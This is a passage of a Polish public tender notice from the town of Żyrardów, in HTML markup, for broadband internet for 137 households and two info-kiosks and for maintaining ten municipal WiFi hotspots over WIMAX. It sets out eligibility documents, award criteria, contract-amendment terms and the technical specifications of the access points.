                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy zamawiający żąda dołączenia do oferty następujących oświadczeń i dokumentów:
oświadczenie o braku podstaw do wykluczenia (Załącznik nr 3 do SIWZ);
odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie 
z art. 22 Pzp, którego wzór stanowi Załącznik nr 2 do SIWZ.
Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie  według wzoru stanowiącego Załącznik nr 3 do SIWZ.
Dokument potwierdzający posiadanie licencji na pasmo WIMAX 3,5-3,8 GHz przynajmniej do 31.12.2017 roku.(dla zadania nr 2) 
Wpis do Rejestru Przedsiębiorców Telekomunikacyjnych prowadzonego przez Urząd Komunikacji Elektronicznej (dla zadania nr 1 i nr 2)
Oświadczenia Wykonawcy, że posiada przynajmniej 5 stacji bazowych w technologii WIMAX, w oparciu o które świadczą komercyjne usługi dla min. 1000 użytkowników (dla zadania nr 2).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zgodnie z art. 24 ust. 11 Pzp wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji z otwarcia ofert, przekazuje zamawiającemu oświadczenie 
o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa 
w art. 24 ust. 1 pkt 23 Pzp. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas usnięcia awarii </td><td>30</td></tr><tr><td>przedłużony okres płatności faktury </td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dla zadania nr 1 
4.	Zamawiający dopuszcza możliwość zmiany umowy, w zakresie: 
1.zmiany lokalizacji instalacji, konfiguracji i dostarczenia internetu, obejmujące przeniesienie usługi dostępu do internetu pod inny, wskazany przez Zamawiającego, adres położony w granicach administracyjnych Gminy Żyrardów, w przypadku zmiany miejsca pobytu odbiorcy końcowego lub zmiany odbiorcy końcowego, przy założeniu, że Wykonawca potwierdzi możliwości techniczne świadczenia usługi zgodnie z ww. parametrami technicznymi. Zamawiający zakłada nie więcej jak 30 % zmian lokalizacji;
2.zmiany podwykonawcy, w przypadku kiedy Wykonawca powierzył wykonanie części zamówienia podwykonawcy.
Dla zadania nr 2 
1.	Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 4 ust. 1 Umowy, w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:
1)	zmiany stawki podatku od towarów i usług,
2)	zmiany wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę,
3)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
na zasadach i w sposób określony w ust. 2 - 12, jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez Wykonawcę.
2.	Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt 1, będzie odnosić się wyłącznie do części przedmiotu Umowy zrealizowanej, zgodnie z terminami ustalonymi Umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu Umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług.
3.	W przypadku zmiany, o której mowa w ust. 1 pkt 1, wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów.
4.	Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt 2 lub 3, będzie obejmować wyłącznie część wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania Umowy przez Wykonawcę w związku z wejściem w życie przepisów odpowiednio zmieniających wysokość minimalnego wynagrodzenia za pracę lub dokonujących zmian w zakresie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
5.	W przypadku zmiany, o której mowa w ust. 1 pkt 2, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą wzrostowi kosztu Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń Pracowników świadczących Usługi do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. Kwota odpowiadająca wzrostowi kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia Pracowników świadczących Usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy.
6.	W przypadku zmiany, o której mowa w ust. 1 pkt 3, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy ponoszonego w związku z wypłatą wynagrodzenia Pracownikom świadczącym Usługi. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia Pracowników Świadczących Usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy.
7.	W celu zawarcia aneksu, o którym mowa w ust. 1, każda ze Stron może wystąpić do drugiej Strony z wnioskiem o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniem zawierającym w szczególności szczegółowe wyliczenie całkowitej kwoty, o jaką wynagrodzenie Wykonawcy powinno ulec zmianie, oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmiana wysokości kosztów wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia należnego Wykonawcy. 
8.	W przypadku zmian, o których mowa w ust. 1 pkt 2 lub pkt 3, jeżeli z wnioskiem występuje Wykonawca, jest on zobowiązany dołączyć do wniosku dokumenty, z których będzie wynikać, w jakim zakresie zmiany te mają wpływ na koszty wykonania Umowy, w szczególności:
1)	pisemne zestawienie wynagrodzeń (zarówno przed jak i po zmianie) Pracowników świadczących Usługi, wraz z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy oraz części wynagrodzenia odpowiadającej temu zakresowi - w przypadku zmiany, o której mowa w ust. 1 pkt 2, lub 
2)	pisemne zestawienie wynagrodzeń (zarówno przed jak i po zmianie) Pracowników świadczących Usługi, wraz z kwotami składek uiszczanych do Zakładu Ubezpieczeń Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego w części finansowanej przez Wykonawcę, z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy oraz części wynagrodzenia odpowiadającej temu zakresowi - w przypadku zmiany, o której mowa w ust. 1 pkt 3.
9.	W przypadku zmiany, o której mowa w ust. 1 pkt 3, jeżeli z wnioskiem występuje Zamawiający, jest on uprawniony do zobowiązania Wykonawcy do przedstawienia w wyznaczonym terminie, nie krótszym niż 10 dni roboczych, dokumentów, z których będzie wynikać w jakim zakresie zmiana ta ma wpływ na koszty wykonania Umowy, w tym pisemnego zestawienia wynagrodzeń, o którym mowa w ust. 8 pkt 2.
10.	W terminie do 10 dni roboczych od dnia przekazania wniosku, o którym mowa w ust. 7, Strona, która otrzymała wniosek, przekaże drugiej Stronie informację o zakresie, w jakim zatwierdza wniosek oraz wskaże kwotę, o którą wynagrodzenie należne Wykonawcy powinno ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z uzasadnieniem.
11.	W przypadku otrzymania przez Stronę informacji o niezatwierdzeniu wniosku lub częściowym zatwierdzeniu wniosku, Strona ta może ponownie wystąpić z wnioskiem, o którym mowa w ust. 7. W takim przypadku przepisy ust. 8 - 10 oraz 12 stosuje się odpowiednio.
12.	Zawarcie aneksu nastąpi nie później niż w terminie 10 dni roboczych od dnia zatwierdzenia wniosku o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/12/2016, godzina: 08:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>DOSTARCZENIE SZEROKOPASMOWEGO INTERNETU DLA 137 GOSPODARSTW DOMOWYCH ORAZ DLA 2 SZT. INFOKIOSKÓW W RAMACH TRWAŁOŚCI PROJEKTÓW: LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA ORAZ LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA - II etap <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Szczegółowy opis przedmiotu zamówienia - wymagania dla dostępu do Internetu dla 137 gospodarstw domowych oraz dla 2 szt. infokiosków z terenu Miasta Żyrardowa
Parametr	Minimalne wymagane parametry
Parametry techniczne	1)	stały dostęp do sieci Internet,
2)	transfer do komputera użytkownika (download) minimum 1 Mb/s, 
3)	transfer od komputera użytkownika (upload) minimum 256 kbit/s,
4)	brak limitu transferu danych (zarówno pobieranych jak i wysyłanych).
Gwarancja	1)	Dostęp do Internetu z punktu widzenia Zamawiającego musi działać bezobsługowo, co oznacza, że nie jest wymagane podawanie loginów, haseł czy nr PIN aby mieć możliwość korzystania z Internetu.
2)	Dodatkowe, niezbędne urządzenia do prawidłowego działania łącza dostarcza Wykonawca,
3)	Zamawiający wyklucza rozwiązania oparte na kartach rozszerzeń montowanych wewnątrz obudowy komputera. Urządzenia dostępowe muszą być wyposażone w interfejs USB lub ETHERNET (RJ-45) umożliwiający podłączenie do komputera bez integracji w komputer.
4)	Urządzenia dodatkowe, muszą mieć funkcjonalność automatycznego instalowania sterowników i konfigurowania się w systemie operacyjnym po podłączeniu do komputera lub tylko podłączenie przez kabel sieciowy (RJ-45) lub USB,
5)	Wykonawca poniesie wszystkie koszty związane z instalacją i konfiguracją usługi. 
6)	W razie awarii Wykonawca przyjmie każde zgłoszenie w godzinach 9.00 - 20.00. Czas usunięcia awarii  maksymalnie do 24 godzin od momentu zgłoszenia (telefonicznie, mailem). W przypadku braku możliwości usunięcia wady lub usterki w sposób zdalny ich usunięcie musi nastąpić w ciągu 3 dni roboczych od dnia zgłoszenia (z możliwością przedłużenia tego okresu o czas naprawy urządzeń, na które udzielona jest gwarancja producenta),
7)	Wymiana uszkodzonych lub wadliwych części odpowiadających za łącze internetowe z wyłączeniem karty sieciowej, Wykonawca dokona na koszt własny. Czas realizacji 5 dni roboczych od chwili stwierdzenia uszkodzenia wymagającego naprawy (z możliwością przedłużenia tego okresu o czas naprawy urządzeń, na które udzielona jest gwarancja producenta)
8)	Koszty serwisu (w tym nieuzasadnione wezwania serwisu) są wliczone w opłatę abonamentową i nie podlegają dodatkowym opłatom. Wykonawca realizuje serwis od 2 stycznia 2017 r. do 31 grudnia 2018r.,
9)	Z każdej czynności serwisowania konieczny jest protokół potwierdzający wykonanie usługi podpisany przez użytkownika końcowego i Wykonawcę. W przypadku gdy naprawa wykonywana jest zdalnie potwierdzenie jej wykonania nie wymaga podpisu użytkownika końcowego, 
10)	Wykonawca udziela gwarancji na poprawne funkcjonowanie sygnału.
Inne	1)	Jeśli zachodzi taka potrzeba, zaleca się dokonanie wizji lokalnej warunków technicznych w miejscach zamieszkania użytkownika końcowego,
2)	Techniczne warunki dostarczenia usługi pozostają w gestii Wykonawcy, 
3)	Montaż fizyczny wszystkich elementów koniecznych do uruchomienia sygnału internetowego  (okablowanie, korytka, urządzenia aktywne, montaż w pomieszczeniach, montaż w punktach dystrybucyjnych, itd.),
4)	Konfiguracja łącza (uruchomienie sygnału),
5)	Koszty związane z realizacją zamówienia ponosi Wykonawca.
6)	Gwarancja możliwości przeniesienia usługi dostępu do Internetu pod inny wskazany przez Zamawiającego adres położony w granicach administracyjnych gminny Żyrardów, w przypadku zmiany miejsca stałego pobytu odbiorcy końcowego lub zmiany odbiorcy końcowego. Przy założeniach, że Wykonawca potwierdzi możliwości techniczne świadczenia usługi zgodnie z ww. parametrami technicznymi. Zamawiający zakłada nie więcej jak 30% zmian lokalizacji.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>72410000-7, 72411000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas usunięcia awarii</td><td>30</td></tr><tr><td>przedłużony termin płatności faktury</td><td>10</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>UTRZYMANIE  URZĄDZEŃ  NIEZBĘDNYCH DO TRANSMISJI SYGNAŁU WIFI W 10 LOKALIZACJACH (NA BUDYNKACH) NA  TERENIE MIASTA ŻYRARDÓW ORAZ ŚWIADCZENIE USŁUGI TRANSMISJI DANYCH, DOSTĘPU DO INTERNETU I WSPARCIA UŻYTKOWNIKÓW<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymanie urządzeń niezbędnych do transmisji sygnału WiFi w 10 lokalizacjach (na budynkach) na terenie Miasta Żyrardów, zgodnie z poniższym wykazem.
Wykaz lokalizacji HotSpotów:
Lp	Adres budynku	Informacja o lokalizacji
1.		Plac Jana Pawła II 1	budynek Urzędu Miasta Żyrardowa
2.		ul. S. Okrzei 16	Skrzyżowanie z ul. Łukasińskiego
3.		ul. Środkowa 36	Budynek Specjalnego Ośrodka Szkolno  Wychowawczego
4.		ul. Bohaterów Warszawy 4	Budynek Zespołu Szkół nr 1
5.		ul. J. Mireckiego 56	Budynek Zespołu Szkół Publicznych nr 6
6.		ul. Jasna 11	Budynek Zespołu Szkół Publicznych nr 1
7.		ul. B. Limanowskiego 44	Budynek Kantoru
8.		ul. Sienkiewicza 2	Skrzyżowanie z ul. POW
9.		ul. S. Jodłowskiego 25/27	Budynek AQUA Sp. z o.o.
10.		ul. Roosevelta 2	Budynek Zespołu Szkół Publicznych nr 7

Opis zainstalowanych urządzeń - punktów dostępowych WiFi (Access Point - AP):
Nr	Parametr	Opis
1.		Typ interfejsu radiowego	WiFi: IEEE 802.11b/g
2.		Rodzaje pracy interfejsu radiowego	802.11b+g, 802.11b, 802.11g
3.		Zakres częstotliwości	2400-2497 MHz
4.		Kanały pracy radia	ETSI (EUR): 2412 ~ 2472 MHz (CH1-CH13)
5.		Pasmo pracy kanału	20 MHz
6.		Szybkości transmisji danych	802.11b: 1, 2, 5.5, 11 Mbps
802.11g: 6, 9, 12, 18, 24, 36, 48, 54 Mbps
7.		Technologia pracy interfejsu radiowego 802.11b	Direct Sequence-Spread Spectrum (DSSS)
8.		Techniki modulacji 802.11b	Differential Binary Phase Shift Keying (DBPSK) 1 Mbps
Differential Quadrature Phase Shift Keying (DQPSK) 2 Mbps;
Complementary Code Keying (CCK) 5.5 and 11 Mbps
9.		Maksymalna moc nadawania	20dBm
10.		Kontrola (zarządzanie) mocą nadawania	0% - 100%
11.		Złącza antenowe	2 x N-Type, 50 ohm
12.		Zasilanie AC (prąd zmienny)	85-260VAC, 47-63Hz
13.		Maksymalny pobór mocy (prąd zmienny)	2,5A
14.		Zasilanie DC (prąd stały)	42 VDC to 60 VDC
15.		Maksymalny pobór mocy (prąd stały)	3,5A
16.		Przełączania zasilania - sposób pracy przy podłączonym zarówno zasilaniu AC i DC	Zasilanie AC jako główne, przełączenie na zasilanie DC w momencie zaniku zasilania głównego
17.		Temperatura pracy urządzeń	od -40oC  do  +55oC
18.		Zabezpieczenie przeciwwilgociowe - urządzenie WiFi oraz wszystkie złącza	IP-67 (praca na zewnątrz, sprzęt klasy operatorskiej)
19.		Praca przy maksymalnym wietrze	do 150 Km/godzinę
20.		Wytrzymałość urządzeń na wiatr	do 200 Km/ godzinę
21.		Pozytywna weryfikacja wymagań przeciwzakłóceniowych dla urządzeń cyfrowych klasy B	Sprzęt przeszedł testy
22.		Spełnianie wymagań Unii Europejskiej w zakresie dyrektyw R&amp;TTE (1999/5/EC)	EN 60950 (IEC 60950)  bezpieczeństwo produktu;
EN 300 328  techn. wymagania dla urządzeń radiowych 2.4 GHz (11b/g);
EN 301 489-1 / EN 301 489-17  techn. wymagania dla zasilania stałego DC;
Wymagania EMC dla urządzeń radiowych (EN55022 CE Class B, FCC Class B Part 15);
23.		Zysk antenowy	8dBi
24.		Promieniowanie anten: poziome/pionowe	360o / 15 o  - anteny dookólne
25.		Sposób realizacji transmisji do AP	standard Ethernet (w tym PoE  zasilanie poprzez Ethernet)
26.		skanowanie i dobór częstotliwości  kanału pracy	Automatyczne i ręczne

2.	Prowadzenie systemu rejestracji, logowania i autoryzacji Użytkowników HotSpotów, 
wg poniższego scenariusza:
a.	Każdorazowa próba skorzystania przez Użytkownika z HotSpota musi być poprzedzona zalogowaniem się na stronie logowania.
b.	Pierwsza próba skorzystania przez Użytkownika z HotSpota musi zostać poprzedzona Rejestracją użytkownika na stronie rejestracji.
3.	Świadczenie usługi transmisji sygnału do 10 HotSpotów w paśmie licencjonowanym WIMAX 3,5 -3,8 GHz przez okres od 01 stycznia 2017 do 31 grudnia 2018. (Wykonawca powinien posiadać licencję na pasmo WIMAX 3,6-3,8 GHz przynajmniej do 31 grudnia 2018 r.). Sygnał transmitowany do każdego z HotSpotów powinien być o prędkości minimum 1 Mb/s.
4.	Zapewnienie w oparciu o wybudowaną sieć dostępu do bezprzewodowego Internetu dla zainteresowanych użytkowników z terenu Miasta Żyrardów - udostępnienie dla każdego użytkownika połączenia internetowego o prędkości max 144 kb/s z blokadą stron pornograficznych i sieci p2p (zrealizowaną dodatkowo poprzez ograniczenie długości jednorazowej sesji do 1 godziny).
